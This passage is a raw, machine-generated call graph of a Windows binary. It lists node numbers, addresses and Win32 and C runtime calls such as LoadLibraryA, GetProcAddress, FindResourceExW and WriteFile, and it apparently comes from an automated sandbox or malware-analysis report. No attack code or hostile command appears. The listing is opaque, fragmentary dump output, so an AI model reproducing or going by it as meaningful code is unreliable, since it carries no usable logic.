59 API calls 105126->105130 105127 c07de1 59 API calls 105128 c03808 105127->105128 105355 c084c0 105128->105355 105132 c3d1c3 105130->105132 105131 c0381a Mailbox 105133 c07de1 59 API calls 105131->105133 105134 c03ed0 59 API calls 105132->105134 105135 c03840 105133->105135 105136 c3d1df 105134->105136 105137 c084c0 69 API calls 105135->105137 105138 c04706 61 API calls 105136->105138 105141 c0384f Mailbox 105137->105141 105139 c3d204 105138->105139 105140 c03ed0 59 API calls 105139->105140 105142 c3d210 105140->105142 105143 c07667 59 API calls 105141->105143 105144 c08047 59 API calls 105142->105144 105145 c0386d 105143->105145 105146 c3d21e 105144->105146 105359 c03ed0 105145->105359 105148 c03ed0 59 API calls 105146->105148 105150 c3d22d 105148->105150 105156 c08047 59 API calls 105150->105156 105152 c03887 105152->105126 105153 c03891 105152->105153 105154 c22efd _W_store_winword 60 API calls 105153->105154 105155 c0389c 105154->105155 105155->105132 105157 c038a6 105155->105157 105158 c3d24f 105156->105158 105159 c22efd _W_store_winword 60 API calls 105157->105159 105160 c03ed0 59 API calls 105158->105160 105161 c038b1 105159->105161 105163 c3d25c 105160->105163 105161->105136 105162 c038bb 105161->105162 105164 c22efd _W_store_winword 60 API calls 105162->105164 105163->105163 105165 c038c6 105164->105165 105165->105150 105166 c03907 105165->105166 105168 c03ed0 59 API calls 105165->105168 105166->105150 105167 c03914 105166->105167 105375 c092ce 105167->105375 105169 c038ea 105168->105169 105171 c08047 59 API calls 105169->105171 105173 c038f8 105171->105173 105176 c03ed0 59 API calls 105173->105176 105176->105166 105178 c0928a 59 API calls 105180 c0394f 105178->105180 105179 c08ee0 60 API calls 105179->105180 105180->105178 105180->105179 105181 c03ed0 59 API calls 105180->105181 105182 c03995 Mailbox 105180->105182 105181->105180 105182->105047 105184 c07292 __write_nolock 105183->105184 105185 c3ea22 _memset 105184->105185 105186 c072ab 105184->105186 105188 c3ea3e GetOpenFileNameW 105185->105188 106042 c04750 105186->106042 105190 c3ea8d 105188->105190 105193 c07bcc 59 API calls 105190->105193 105195 c3eaa2 105193->105195 105195->105195 105196 c072c9 106070 c0686a 105196->106070 105200 c1093a __write_nolock 105199->105200 106327 c06d80 105200->106327 105202 c1093f 105203 c03c14 105202->105203 106338 c1119e 89 API calls 105202->106338 105203->105057 105203->105065 105205 c1094c 105205->105203 106339 c13ee7 91 API calls Mailbox 105205->106339 105207 c10955 105207->105203 105208 c10959 GetFullPathNameW 105207->105208 105209 c07bcc 59 API calls 105208->105209 105210 c10985 105209->105210 105211 c07bcc 59 API calls 105210->105211 105212 c10992 105211->105212 105213 c44cab _wcscat 105212->105213 105214 c07bcc 59 API calls 105212->105214 105214->105203 105216 c03ab0 LoadImageW RegisterClassExW 105215->105216 105217 c3d261 105215->105217 106376 c03041 7 API calls 105216->106376 106377 c047a0 LoadImageW EnumResourceNamesW 105217->106377 105220 c3d26a 105221 c03b34 105222 c039d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105221->105222 105222->105072 105224 c44cc3 105223->105224 105235 c109f5 105223->105235 106517 c69e4a 89 API calls 4 library calls 105224->106517 105226 c10cfa 105226->105080 105228 c10ee4 105228->105226 105230 c10ef1 105228->105230 106515 c11093 331 API calls Mailbox 105230->106515 105231 c10a4b PeekMessageW 105298 c10a05 Mailbox 105231->105298 105233 c10ef8 LockWindowUpdate DestroyWindow GetMessageW 105233->105226 105237 c10f2a 105233->105237 105235->105298 106518 c09e5d 60 API calls 105235->106518 106519 c56349 331 API calls 105235->106519 105236 c44e81 Sleep 105236->105298 105240 c45c58 TranslateMessage DispatchMessageW GetMessageW 105237->105240 105238 c10ce4 105238->105226 106514 c11070 10 API calls Mailbox 105238->106514 105240->105240 105241 c45c88 105240->105241 105241->105226 105242 c10e43 PeekMessageW 105242->105298 105243 c10ea5 TranslateMessage DispatchMessageW 105243->105242 105244 c44d50 TranslateAcceleratorW 105244->105242 105244->105298 105245 c09e5d 60 API calls 105245->105298 105246 c10d13 timeGetTime 105246->105298 105247 c4581f WaitForSingleObject 105250 c4583c GetExitCodeProcess CloseHandle 105247->105250 105247->105298 105249 c20db6 59 API calls Mailbox 105249->105298 105282 c10f95 105250->105282 105251 c10e5f Sleep 105284 c10e70 Mailbox 105251->105284 105252 c08047 59 API calls 105252->105298 105253 c07667 59 API calls 105253->105284 105254 c45af8 Sleep 105254->105284 105257 c2049f timeGetTime 105257->105284 105258 c10f4e timeGetTime 106516 c09e5d 60 API calls 105258->106516 105261 c45b8f GetExitCodeProcess 105265 c45ba5 WaitForSingleObject 105261->105265 105266 c45bbb CloseHandle 105261->105266 105263 c85f25 110 API calls 105263->105284 105264 c0b7dd 109 API calls 105264->105284 105265->105266 105265->105298 105266->105284 105269 c45874 105269->105282 105270 c45078 Sleep 105270->105298 105271 c45c17 Sleep 105271->105298 105273 c07de1 59 API calls 105273->105284 105277 c09ea0 304 API calls 105277->105298 105282->105080 105284->105253 105284->105257 105284->105261 105284->105263 105284->105264 105284->105269 105284->105270 105284->105271 105284->105273 105284->105282 105284->105298 106554 c62408 60 API calls 105284->106554 106555 c09e5d 60 API calls 105284->106555 106556 c089b3 69 API calls Mailbox 105284->106556 106557 c0b73c 331 API calls 105284->106557 106558 c564da 60 API calls 105284->106558 106559 c65244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105284->106559 106560 c63c55 66 API calls Mailbox 105284->106560 105286 c69e4a 89 API calls 105286->105298 105287 c09c90 59 API calls Mailbox 105287->105298 105288 c084c0 69 API calls 105288->105298 105290 c5617e 59 API calls Mailbox 105290->105298 105291 c07de1 59 API calls 105291->105298 105292 c089b3 69 API calls 105292->105298 105293 c455d5 VariantClear 105293->105298 105294 c4566b VariantClear 105294->105298 105295 c08cd4 59 API calls Mailbox 105295->105298 105296 c45419 VariantClear 105296->105298 105297 c56e8f 59 API calls 105297->105298 105298->105231 105298->105236 105298->105238 105298->105242 105298->105243 105298->105244 105298->105245 105298->105246 105298->105247 105298->105249 105298->105251 105298->105252 105298->105254 105298->105258 105298->105277 105298->105282 105298->105284 105298->105286 105298->105287 105298->105288 105298->105290 105298->105291 105298->105292 105298->105293 105298->105294 105298->105295 105298->105296 105298->105297 105299 c0b73c 304 API calls 105298->105299 106378 c0e6a0 105298->106378 106409 c0f460 105298->106409 106428 c031ce 105298->106428 106433 c0e420 331 API calls 105298->106433 106434 c0fce0 105298->106434 106520 c86018 59 API calls 105298->106520 106521 c69a15 59 API calls Mailbox 105298->106521 106522 c5d4f2 59 API calls 105298->106522 106523 c09837 105298->106523 106541 c560ef 59 API calls 2 library calls 105298->106541 106542 c08401 59 API calls 105298->106542 106543 c082df 105298->106543 105299->105298 105300->105050 105301->105057 105302->105069 105304 c31940 __write_nolock 105303->105304 105305 c04713 GetModuleFileNameW 105304->105305 105306 c07de1 59 API calls 105305->105306 105307 c04739 105306->105307 105308 c04750 60 API calls 105307->105308 105309 c04743 Mailbox 105308->105309 105309->105076 105311 c07df0 __wsetenvp _memmove 105310->105311 105312 c20db6 Mailbox 59 API calls 105311->105312 105313 c07e2e 105312->105313 105313->105081 105315 c03d3e __write_nolock 105314->105315 105316 c07bcc 59 API calls 105315->105316 105320 c03ea4 Mailbox 105315->105320 105318 c03d70 105316->105318 105326 c03da6 Mailbox 105318->105326 105436 c079f2 105318->105436 105319 c03e77 105319->105320 105321 c07de1 59 API calls 105319->105321 105320->105106 105323 c03e98 105321->105323 105322 c07de1 59 API calls 105322->105326 105325 c03f74 59 API calls 105323->105325 105324 c079f2 59 API calls 105324->105326 105325->105320 105326->105319 105326->105320 105326->105322 105326->105324 105439 c03f74 105326->105439 105445 c04bb5 105328->105445 105333 c3d8e6 105336 c04e4a 84 API calls 105333->105336 105334 c04e08 LoadLibraryExW 105455 c04b6a 105334->105455 105338 c3d8ed 105336->105338 105340 c04b6a 3 API calls 105338->105340 105341 c3d8f5 105340->105341 105481 c04f0b 105341->105481 105342 c04e2f 105342->105341 105343 c04e3b 105342->105343 105345 c04e4a 84 API calls 105343->105345 105347 c037d4 105345->105347 105347->105113 105347->105114 105349 c3d91c 105489 c04ec7 105349->105489 105351 c3d929 105353 c20db6 Mailbox 59 API calls 105352->105353 105354 c037fb 105353->105354 105354->105127 105356 c084cb 105355->105356 105358 c084f2 105356->105358 105743 c089b3 69 API calls Mailbox 105356->105743 105358->105131 105360 c03ef3 105359->105360 105361 c03eda 105359->105361 105362 c07bcc 59 API calls 105360->105362 105363 c08047 59 API calls 105361->105363 105364 c03879 105362->105364 105363->105364 105365 c22efd 105364->105365 105366 c22f09 105365->105366 105367 c22f7e 105365->105367 105374 c22f2e 105366->105374 105744 c28b28 58 API calls __getptd_noexit 105366->105744 105746 c22f90 60 API calls 3 library calls 105367->105746 105370 c22f8b 105370->105152 105371 c22f15 105745 c28db6 9 API calls __beginthreadex 105371->105745 105373 c22f20 105373->105152 105374->105152 105376 c092d6 105375->105376 105377 c20db6 Mailbox 59 API calls 105376->105377 105378 c092e4 105377->105378 105379 c03924 105378->105379 105747 c091fc 59 API calls Mailbox 105378->105747 105381 c09050 105379->105381 105748 c09160 105381->105748 105383 c20db6 Mailbox 59 API calls 105384 c03932 105383->105384 105386 c08ee0 105384->105386 105385 c0905f 105385->105383 105385->105384 105387 c3f17c 105386->105387 105390 c08ef7 105386->105390 105387->105390 105775 c08bdb 59 API calls Mailbox 105387->105775 105389 c08fff 105389->105180 105390->105389 105391 c09040 105390->105391 105392 c08ff8 105390->105392 105762 c09d3c 105391->105762 105393 c20db6 Mailbox 59 API calls 105392->105393 105393->105389 105396 c04ee5 85 API calls 105395->105396 105397 c695ca 105396->105397 105778 c69734 105397->105778 105400 c04f0b 74 API calls 105401 c695f7 105400->105401 105402 c04f0b 74 API calls 105401->105402 105403 c69607 105402->105403 105404 c04f0b 74 API calls 105403->105404 105405 c69622 105404->105405 105406 c04f0b 74 API calls 105405->105406 105407 c6963d 105406->105407 105408 c04ee5 85 API calls 105407->105408 105409 c69654 105408->105409 105410 c2571c __malloc_crt 58 API calls 105409->105410 105411 c6965b 105410->105411 105412 c2571c __malloc_crt 58 API calls 105411->105412 105413 c69665 105412->105413 105414 c04f0b 74 API calls 105413->105414 105415 c69679 105414->105415 105416 c69109 GetSystemTimeAsFileTime 105415->105416 105417 c6968c 105416->105417 105418 c696b6 105417->105418 105419 c696a1 105417->105419 105421 c696bc 105418->105421 105422 c6971b 105418->105422 105420 c22d55 _free 58 API calls 105419->105420 105423 c696a7 105420->105423 105784 c68b06 116 API calls __fcloseall 105421->105784 105425 c22d55 _free 58 API calls 105422->105425 105426 c22d55 _free 58 API calls 105423->105426 105428 c3d186 105425->105428 105426->105428 105427 c69713 105429 c22d55 _free 58 API calls 105427->105429 105428->105118 105430 c04e4a 105428->105430 105429->105428 105431 c04e54 105430->105431 105435 c04e5b 105430->105435 105785 c253a6 105431->105785 105433 c04e6a 105433->105118 105434 c04e7b FreeLibrary 105434->105433 105435->105433 105435->105434 105437 c07e4f 59 API calls 105436->105437 105438 c079fd 105437->105438 105438->105318 105440 c03f82 105439->105440 105444 c03fa4 _memmove 105439->105444 105442 c20db6 Mailbox 59 API calls 105440->105442 105441 c20db6 Mailbox 59 API calls 105443 c03fb8 105441->105443 105442->105444 105443->105326 105444->105441 105494 c04c03 105445->105494 105448 c04bdc 105449 c04bf5 105448->105449 105450 c04bec FreeLibrary 105448->105450 105452 c2525b 105449->105452 105450->105449 105451 c04c03 2 API calls 105451->105448 105498 c25270 105452->105498 105454 c04dfc 105454->105333 105454->105334 105658 c04c36 105455->105658 105458 c04b8f 105460 c04ba1 FreeLibrary 105458->105460 105461 c04baa 105458->105461 105459 c04c36 2 API calls 105459->105458 105460->105461 105462 c04c70 105461->105462 105463 c20db6 Mailbox 59 API calls 105462->105463 105464 c04c85 105463->105464 105662 c0522e 105464->105662 105466 c04c91 _memmove 105467 c04dc1 105466->105467 105468 c04d89 105466->105468 105472 c04ccc 105466->105472 105676 c6991b 95 API calls 105467->105676 105665 c04e89 CreateStreamOnHGlobal 105468->105665 105469 c04ec7 69 API calls 105478 c04cd5 105469->105478 105472->105469 105473 c04f0b 74 API calls 105473->105478 105474 c04d69 105474->105342 105476 c3d8a7 105477 c04ee5 85 API calls 105476->105477 105479 c3d8bb 105477->105479 105478->105473 105478->105474 105478->105476 105671 c04ee5 105478->105671 105480 c04f0b 74 API calls 105479->105480 105480->105474 105482 c04f1d 105481->105482 105483 c3d9cd 105481->105483 105700 c255e2 105482->105700 105486 c69109 105720 c68f5f 105486->105720 105488 c6911f 105488->105349 105490 c3d990 105489->105490 105491 c04ed6 105489->105491 105725 c25c60 105491->105725 105493 c04ede 105493->105351 105495 c04bd0 105494->105495 105496 c04c0c LoadLibraryA 105494->105496 105495->105448 105495->105451 105496->105495 105497 c04c1d GetProcAddress 105496->105497 105497->105495 105499 c2527c __wsopen_helper 105498->105499 105500 c2528f 105499->105500 105502 c252c0 105499->105502 105547 c28b28 58 API calls __getptd_noexit 105500->105547 105517 c304e8 105502->105517 105503 c25294 105548 c28db6 9 API calls __beginthreadex 105503->105548 105506 c252c5 105507 c252db 105506->105507 105508 c252ce 105506->105508 105510 c25305 105507->105510 105511 c252e5 105507->105511 105549 c28b28 58 API calls __getptd_noexit 105508->105549 105532 c30607 105510->105532 105550 c28b28 58 API calls __getptd_noexit 105511->105550 105512 c2529f __wsopen_helper @_EH4_CallFilterFunc@8 105512->105454 105518 c304f4 __wsopen_helper 105517->105518 105519 c29c0b __lock 58 API calls 105518->105519 105529 c30502 105519->105529 105520 c3057d 105557 c2881d 58 API calls __malloc_crt 105520->105557 105523 c30584 105530 c30576 105523->105530 105558 c29e2b InitializeCriticalSectionAndSpinCount 105523->105558 105524 c305f3 __wsopen_helper 105524->105506 105526 c29c93 __mtinitlocknum 58 API calls 105526->105529 105528 c305aa EnterCriticalSection 105528->105530 105529->105520 105529->105526 105529->105530 105555 c26c50 59 API calls __lock 105529->105555 105556 c26cba LeaveCriticalSection LeaveCriticalSection _doexit 105529->105556 105552 c305fe 105530->105552 105541 c30627 __wopenfile 105532->105541 105533 c30641 105563 c28b28 58 API calls __getptd_noexit 105533->105563 105535 c307fc 105535->105533 105539 c3085f 105535->105539 105536 c30646 105564 c28db6 9 API calls __beginthreadex 105536->105564 105538 c25310 105551 c25332 LeaveCriticalSection LeaveCriticalSection _fseek 105538->105551 105560 c385a1 105539->105560 105541->105533 105541->105535 105565 c237cb 60 API calls 2 library calls 105541->105565 105543 c307f5 105543->105535 105566 c237cb 60 API calls 2 library calls 105543->105566 105545 c30814 105545->105535 105567 c237cb 60 API calls 2 library calls 105545->105567 105547->105503 105548->105512 105549->105512 105550->105512 105551->105512 105559 c29d75 LeaveCriticalSection 105552->105559 105554 c30605 105554->105524 105555->105529 105556->105529 105557->105523 105558->105528 105559->105554 105568 c37d85 105560->105568 105562 c385ba 105562->105538 105563->105536 105564->105538 105565->105543 105566->105545 105567->105535 105569 c37d91 __wsopen_helper 105568->105569 105570 c37da7 105569->105570 105572 c37ddd 105569->105572 105655 c28b28 58 API calls __getptd_noexit 105570->105655 105579 c37e4e 105572->105579 105573 c37dac 105656 c28db6 9 API calls __beginthreadex 105573->105656 105576 c37df9 105657 c37e22 LeaveCriticalSection __unlock_fhandle 105576->105657 105578 c37db6 __wsopen_helper 105578->105562 105580 c37e6e 105579->105580 105581 c244ea __wsopen_nolock 58 API calls 105580->105581 105585 c37e8a 105581->105585 105582 c37fc1 105583 c28dc6 __invoke_watson 8 API calls 105582->105583 105584 c385a0 105583->105584 105587 c37d85 __wsopen_helper 103 API calls 105584->105587 105585->105582 105586 c37ec4 105585->105586 105598 c37ee7 105585->105598 105588 c28af4 __write 58 API calls 105586->105588 105589 c385ba 105587->105589 105590 c37ec9 105588->105590 105589->105576 105591 c28b28 __beginthreadex 58 API calls 105590->105591 105592 c37ed6 105591->105592 105594 c28db6 __beginthreadex 9 API calls 105592->105594 105593 c37fa5 105595 c28af4 __write 58 API calls 105593->105595 105596 c37ee0 105594->105596 105597 c37faa 105595->105597 105596->105576 105599 c28b28 __beginthreadex 58 API calls 105597->105599 105598->105593 105601 c37f83 105598->105601 105600 c37fb7 105599->105600 105602 c28db6 __beginthreadex 9 API calls 105600->105602 105603 c2d294 __alloc_osfhnd 61 API calls 105601->105603 105602->105582 105604 c38051 105603->105604 105605 c3805b 105604->105605 105606 c3807e 105604->105606 105608 c28af4 __write 58 API calls 105605->105608 105607 c37cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105606->105607 105617 c380a0 105607->105617 105609 c38060 105608->105609 105611 c28b28 __beginthreadex 58 API calls 105609->105611 105610 c3811e GetFileType 105614 c3816b 105610->105614 105615 c38129 GetLastError 105610->105615 105613 c3806a 105611->105613 105612 c380ec GetLastError 105618 c28b07 __dosmaperr 58 API calls 105612->105618 105619 c28b28 __beginthreadex 58 API calls 105613->105619 105625 c2d52a __set_osfhnd 59 API calls 105614->105625 105616 c28b07 __dosmaperr 58 API calls 105615->105616 105620 c38150 CloseHandle 105616->105620 105617->105610 105617->105612 105621 c37cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105617->105621 105622 c38111 105618->105622 105619->105596 105620->105622 105623 c3815e 105620->105623 105624 c380e1 105621->105624 105627 c28b28 __beginthreadex 58 API calls 105622->105627 105626 c28b28 __beginthreadex 58 API calls 105623->105626 105624->105610 105624->105612 105629 c38189 105625->105629 105628 c38163 105626->105628 105627->105582 105628->105622 105630 c38344 105629->105630 105631 c318c1 __lseeki64_nolock 60 API calls 105629->105631 105646 c3820a 105629->105646 105630->105582 105633 c38517 CloseHandle 105630->105633 105632 c381f3 105631->105632 105636 c28af4 __write 58 API calls 105632->105636 105650 c38212 105632->105650 105634 c37cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105633->105634 105635 c3853e 105634->105635 105638 c38546 GetLastError 105635->105638 105654 c383ce 105635->105654 105636->105646 105637 c30e5b 70 API calls __read_nolock 105637->105650 105639 c28b07 __dosmaperr 58 API calls 105638->105639 105640 c38552 105639->105640 105642 c2d43d __free_osfhnd 59 API calls 105640->105642 105641 c30add __close_nolock 61 API calls 105641->105650 105642->105654 105643 c397a2 __chsize_nolock 82 API calls 105643->105650 105644 c318c1 60 API calls __lseeki64_nolock 105644->105646 105645 c2d886 __write 78 API calls 105645->105646 105646->105630 105646->105644 105646->105645 105646->105650 105647 c383c1 105649 c30add __close_nolock 61 API calls 105647->105649 105648 c383aa 105648->105630 105652 c383c8 105649->105652 105650->105637 105650->105641 105650->105643 105650->105646 105650->105647 105650->105648 105651 c318c1 60 API calls __lseeki64_nolock 105650->105651 105651->105650 105653 c28b28 __beginthreadex 58 API calls 105652->105653 105653->105654 105654->105582 105655->105573 105656->105578 105657->105578 105659 c04b83 105658->105659 105660 c04c3f LoadLibraryA 105658->105660 105659->105458 105659->105459 105660->105659 105661 c04c50 GetProcAddress 105660->105661 105661->105659 105663 c20db6 Mailbox 59 API calls 105662->105663 105664 c05240 105663->105664 105664->105466 105666 c04ea3 FindResourceExW 105665->105666 105670 c04ec0 105665->105670 105667 c3d933 LoadResource 105666->105667 105666->105670 105668 c3d948 SizeofResource 105667->105668 105667->105670 105669 c3d95c LockResource 105668->105669 105668->105670 105669->105670 105670->105472 105672 c04ef4 105671->105672 105673 c3d9ab 105671->105673 105677 c2584d 105672->105677 105675 c04f02 105675->105478 105676->105472 105678 c25859 __wsopen_helper 105677->105678 105679 c2586b 105678->105679 105681 c25891 105678->105681 105690 c28b28 58 API calls __getptd_noexit 105679->105690 105692 c26c11 105681->105692 105683 c25870 105691 c28db6 9 API calls __beginthreadex 105683->105691 105684 c25897 105698 c257be 83 API calls 5 library calls 105684->105698 105687 c258a6 105699 c258c8 LeaveCriticalSection LeaveCriticalSection _fseek 105687->105699 105689 c2587b __wsopen_helper 105689->105675 105690->105683 105691->105689 105693 c26c43 EnterCriticalSection 105692->105693 105694 c26c21 105692->105694 105696 c26c39 105693->105696 105694->105693 105695 c26c29 105694->105695 105697 c29c0b __lock 58 API calls 105695->105697 105696->105684 105697->105696 105698->105687 105699->105689 105703 c255fd 105700->105703 105702 c04f2e 105702->105486 105704 c25609 __wsopen_helper 105703->105704 105705 c25644 __wsopen_helper 105704->105705 105706 c2561f _memset 105704->105706 105707 c2564c 105704->105707 105705->105702 105716 c28b28 58 API calls __getptd_noexit 105706->105716 105708 c26c11 __lock_file 59 API calls 105707->105708 105709 c25652 105708->105709 105718 c2541d 72 API calls 6 library calls 105709->105718 105712 c25639 105717 c28db6 9 API calls __beginthreadex 105712->105717 105713 c25668 105719 c25686 LeaveCriticalSection LeaveCriticalSection _fseek 105713->105719 105716->105712 105717->105705 105718->105713 105719->105705 105723 c2520a GetSystemTimeAsFileTime 105720->105723 105722 c68f6e 105722->105488 105724 c25238 __aulldiv 105723->105724 105724->105722 105726 c25c6c __wsopen_helper 105725->105726 105727 c25c93 105726->105727 105728 c25c7e 105726->105728 105729 c26c11 __lock_file 59 API calls 105727->105729 105739 c28b28 58 API calls __getptd_noexit 105728->105739 105731 c25c99 105729->105731 105741 c258d0 67 API calls 5 library calls 105731->105741 105732 c25c83 105740 c28db6 9 API calls __beginthreadex 105732->105740 105735 c25ca4 105742 c25cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105735->105742 105736 c25c8e __wsopen_helper 105736->105493 105738 c25cb6 105738->105736 105739->105732 105740->105736 105741->105735 105742->105738 105743->105358 105744->105371 105745->105373 105746->105370 105747->105379 105749 c09169 Mailbox 105748->105749 105750 c3f19f 105749->105750 105755 c09173 105749->105755 105751 c20db6 Mailbox 59 API calls 105750->105751 105752 c3f1ab 105751->105752 105753 c0917a 105753->105385 105755->105753 105756 c09c90 105755->105756 105758 c09c9b 105756->105758 105757 c09cd2 105757->105755 105758->105757 105761 c08cd4 59 API calls Mailbox 105758->105761 105760 c09cfd 105760->105755 105761->105760 105763 c09d4a 105762->105763 105773 c09d78 Mailbox 105762->105773 105764 c09d9d 105763->105764 105767 c09d50 Mailbox 105763->105767 105766 c08047 59 API calls 105764->105766 105765 c09d64 105768 c09dcc 105765->105768 105769 c09d6f 105765->105769 105765->105773 105766->105773 105767->105765 105770 c3fa0f 105767->105770 105768->105773 105776 c08cd4 59 API calls Mailbox 105768->105776 105772 c3f9e6 VariantClear 105769->105772 105769->105773 105770->105773 105777 c56e8f 59 API calls 105770->105777 105772->105773 105773->105389 105775->105390 105776->105773 105777->105773 105781 c69748 __tzset_nolock _wcscmp 105778->105781 105779 c04f0b 74 API calls 105779->105781 105780 c69109 GetSystemTimeAsFileTime 105780->105781 105781->105779 105781->105780 105782 c695dc 105781->105782 105783 c04ee5 85 API calls 105781->105783 105782->105400 105782->105428 105783->105781 105784->105427 105786 c253b2 __wsopen_helper 105785->105786 105787 c253c6 105786->105787 105788 c253de 105786->105788 105814 c28b28 58 API calls __getptd_noexit 105787->105814 105791 c26c11 __lock_file 59 API calls 105788->105791 105794 c253d6 __wsopen_helper 105788->105794 105790 c253cb 105815 c28db6 9 API calls __beginthreadex 105790->105815 105793 c253f0 105791->105793 105798 c2533a 105793->105798 105794->105435 105799 c25349 105798->105799 105800 c2535d 105798->105800 105860 c28b28 58 API calls __getptd_noexit 105799->105860 105802 c25359 105800->105802 105817 c24a3d 105800->105817 105816 c25415 LeaveCriticalSection LeaveCriticalSection _fseek 105802->105816 105803 c2534e 105861 c28db6 9 API calls __beginthreadex 105803->105861 105810 c25377 105834 c30a02 105810->105834 105812 c2537d 105812->105802 105813 c22d55 _free 58 API calls 105812->105813 105813->105802 105814->105790 105815->105794 105816->105794 105818 c24a50 105817->105818 105819 c24a74 105817->105819 105818->105819 105820 c246e6 __fputwc_nolock 58 API calls 105818->105820 105823 c30b77 105819->105823 105821 c24a6d 105820->105821 105862 c2d886 105821->105862 105824 c25371 105823->105824 105825 c30b84 105823->105825 105827 c246e6 105824->105827 105825->105824 105826 c22d55 _free 58 API calls 105825->105826 105826->105824 105828 c246f0 105827->105828 105829 c24705 105827->105829 105997 c28b28 58 API calls __getptd_noexit 105828->105997 105829->105810 105831 c246f5 105998 c28db6 9 API calls __beginthreadex 105831->105998 105833 c24700 105833->105810 105835 c30a0e __wsopen_helper 105834->105835 105836 c30a32 105835->105836 105837 c30a1b 105835->105837 105839 c30abd 105836->105839 105841 c30a42 105836->105841 106014 c28af4 58 API calls __getptd_noexit 105837->106014 106019 c28af4 58 API calls __getptd_noexit 105839->106019 105840 c30a20 106015 c28b28 58 API calls __getptd_noexit 105840->106015 105844 c30a60 105841->105844 105845 c30a6a 105841->105845 106016 c28af4 58 API calls __getptd_noexit 105844->106016 105849 c2d206 ___lock_fhandle 59 API calls 105845->105849 105846 c30a65 106020 c28b28 58 API calls __getptd_noexit 105846->106020 105847 c30a27 __wsopen_helper 105847->105812 105851 c30a70 105849->105851 105853 c30a83 105851->105853 105854 c30a8e 105851->105854 105852 c30ac9 106021 c28db6 9 API calls __beginthreadex 105852->106021 105999 c30add 105853->105999 106017 c28b28 58 API calls __getptd_noexit 105854->106017 105858 c30a89 106018 c30ab5 LeaveCriticalSection __unlock_fhandle 105858->106018 105860->105803 105861->105802 105863 c2d892 __wsopen_helper 105862->105863 105864 c2d8b6 105863->105864 105865 c2d89f 105863->105865 105867 c2d955 105864->105867 105870 c2d8ca 105864->105870 105963 c28af4 58 API calls __getptd_noexit 105865->105963 105969 c28af4 58 API calls __getptd_noexit 105867->105969 105869 c2d8a4 105964 c28b28 58 API calls __getptd_noexit 105869->105964 105873 c2d8f2 105870->105873 105874 c2d8e8 105870->105874 105871 c2d8ed 105970 c28b28 58 API calls __getptd_noexit 105871->105970 105890 c2d206 105873->105890 105965 c28af4 58 API calls __getptd_noexit 105874->105965 105878 c2d8f8 105880 c2d90b 105878->105880 105881 c2d91e 105878->105881 105879 c2d961 105971 c28db6 9 API calls __beginthreadex 105879->105971 105899 c2d975 105880->105899 105966 c28b28 58 API calls __getptd_noexit 105881->105966 105885 c2d8ab __wsopen_helper 105885->105819 105886 c2d917 105968 c2d94d LeaveCriticalSection __unlock_fhandle 105886->105968 105887 c2d923 105967 c28af4 58 API calls __getptd_noexit 105887->105967 105891 c2d212 __wsopen_helper 105890->105891 105892 c2d261 EnterCriticalSection 105891->105892 105893 c29c0b __lock 58 API calls 105891->105893 105894 c2d287 __wsopen_helper 105892->105894 105895 c2d237 105893->105895 105894->105878 105896 c2d24f 105895->105896 105972 c29e2b InitializeCriticalSectionAndSpinCount 105895->105972 105973 c2d28b LeaveCriticalSection _doexit 105896->105973 105900 c2d982 __write_nolock 105899->105900 105901 c2d9e0 105900->105901 105902 c2d9c1 105900->105902 105930 c2d9b6 105900->105930 105905 c2da38 105901->105905 105906 c2da1c 105901->105906 105983 c28af4 58 API calls __getptd_noexit 105902->105983 105903 c2c5f6 __fputwc_nolock 6 API calls 105907 c2e1d6 105903->105907 105909 c2da51 105905->105909 105989 c318c1 60 API calls 3 library calls 105905->105989 105986 c28af4 58 API calls __getptd_noexit 105906->105986 105907->105886 105908 c2d9c6 105984 c28b28 58 API calls __getptd_noexit 105908->105984 105974 c35c6b 105909->105974 105913 c2d9cd 105985 c28db6 9 API calls __beginthreadex 105913->105985 105915 c2da21 105987 c28b28 58 API calls __getptd_noexit 105915->105987 105917 c2da5f 105919 c2ddb8 105917->105919 105990 c299ac 58 API calls 2 library calls 105917->105990 105921 c2ddd6 105919->105921 105922 c2e14b WriteFile 105919->105922 105920 c2da28 105988 c28db6 9 API calls __beginthreadex 105920->105988 105925 c2defa 105921->105925 105934 c2ddec 105921->105934 105926 c2ddab GetLastError 105922->105926 105932 c2dd78 105922->105932 105936 c2df05 105925->105936 105940 c2dfef 105925->105940 105926->105932 105927 c2da8b GetConsoleMode 105927->105919 105929 c2daca 105927->105929 105928 c2e184 105928->105930 105995 c28b28 58 API calls __getptd_noexit 105928->105995 105929->105919 105933 c2dada GetConsoleCP 105929->105933 105930->105903 105932->105928 105932->105930 105939 c2ded8 105932->105939 105933->105928 105961 c2db09 105933->105961 105934->105928 105935 c2de5b WriteFile 105934->105935 105935->105926 105937 c2de98 105935->105937 105936->105928 105941 c2df6a WriteFile 105936->105941 105937->105934 105942 c2debc 105937->105942 105938 c2e1b2 105996 c28af4 58 API calls __getptd_noexit 105938->105996 105944 c2dee3 105939->105944 105945 c2e17b 105939->105945 105940->105928 105946 c2e064 WideCharToMultiByte 105940->105946 105941->105926 105947 c2dfb9 105941->105947 105942->105932 105992 c28b28 58 API calls __getptd_noexit 105944->105992 105994 c28b07 58 API calls 3 library calls 105945->105994 105946->105926 105955 c2e0ab 105946->105955 105947->105932 105947->105936 105947->105942 105950 c2e0b3 WriteFile 105953 c2e106 GetLastError 105950->105953 105950->105955 105951 c2dee8 105993 c28af4 58 API calls __getptd_noexit 105951->105993 105953->105955 105955->105932 105955->105940 105955->105942 105955->105950 105956 c37a5e WriteConsoleW CreateFileW __putwch_nolock 105960 c2dc5f 105956->105960 105957 c362ba 60 API calls __write_nolock 105957->105961 105958 c2dbf2 WideCharToMultiByte 105958->105932 105959 c2dc2d WriteFile 105958->105959 105959->105926 105959->105960 105960->105926 105960->105932 105960->105956 105960->105961 105962 c2dc87 WriteFile 105960->105962 105961->105932 105961->105957 105961->105958 105961->105960 105991 c235f5 58 API calls __isleadbyte_l 105961->105991 105962->105926 105962->105960 105963->105869 105964->105885 105965->105871 105966->105887 105967->105886 105968->105885 105969->105871 105970->105879 105971->105885 105972->105896 105973->105892 105975 c35c83 105974->105975 105976 c35c76 105974->105976 105979 c35c8f 105975->105979 105980 c28b28 __beginthreadex 58 API calls 105975->105980 105977 c28b28 __beginthreadex 58 API calls 105976->105977 105978 c35c7b 105977->105978 